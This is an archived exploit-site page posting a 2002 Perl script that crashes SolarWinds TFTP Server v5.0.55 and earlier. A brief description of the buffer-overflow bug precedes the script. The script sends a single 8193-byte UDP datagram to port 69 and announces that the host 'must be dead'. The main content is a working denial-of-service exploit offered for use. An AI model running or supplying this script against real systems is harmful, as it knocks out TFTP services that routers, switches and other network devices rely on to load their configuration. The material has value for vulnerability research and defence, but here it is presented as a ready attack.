exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

tftp.dos.pl

tftp.dos.pl
Posted Oct 25, 2002
Authored by D4rkGr3y | Site dhgroup.org

Solarwinds TFTP server v5.0.55 and below remote denial of service exploit in perl.

tags | exploit, remote, denial of service, perl
SHA-256 | 165893e2a72b6c7b01bf0b5e59020ebd0ef42cf6184037b8c607536b68ae7f46

tftp.dos.pl

Change Mirror Download
#############################################
#Product: TFTP Server 2002 Standard Edition #
#Authors: SolarWinds [www.SolarWinds.net] #
#Vulnerable versions: v.5.0.55 and bellow #
#Vulnerability: buffer overflow #
#Bug&exploit by D4rkGr3y [www.dhgroup.org] #
#############################################

#Overview#--------------------------------------------------------------#
From TFTP Server help:
"Many network devices require a TFTP Server to load their initial
operating system or configuration. Many routers, switches, hubs,
X-terminals, printers, terminal servers, etc need a TFTP server
in order to load their initial configuration".

#Description#------------------------------------------------------------#
First, TFTP - Trivial File Transfer Protocol. This is not FTP! TFTP and
FTP are different protocols - it's very important! TFTP uses UDP protocol
for it's work and it doesn't support some FTP's stuff. Directory travel
for example. U can use TFTP for file transfer only. Read RFC 1350 for
more details.

#Bug#--------------------------------------------------------------------#
It's possible to crash TFTP server using UDP datagram with a large size
(8193b and above). Vulnerable application on remote host will be closed
with error message:

Run-time error '10040':
The datagram is too large to fit into the buffer and is truncated.

#Exploit#----------------------------------------------------------------#

#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "vulnerable_host";
$port = "69";
$data = "q";
$num = "8193";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";
$ipaddr = inet_aton($host);
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
print "Now, '$host' must be dead :)\n";

#EOF

Best regards www.dhgroup.org
D4rkGr3y icq 540981


Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close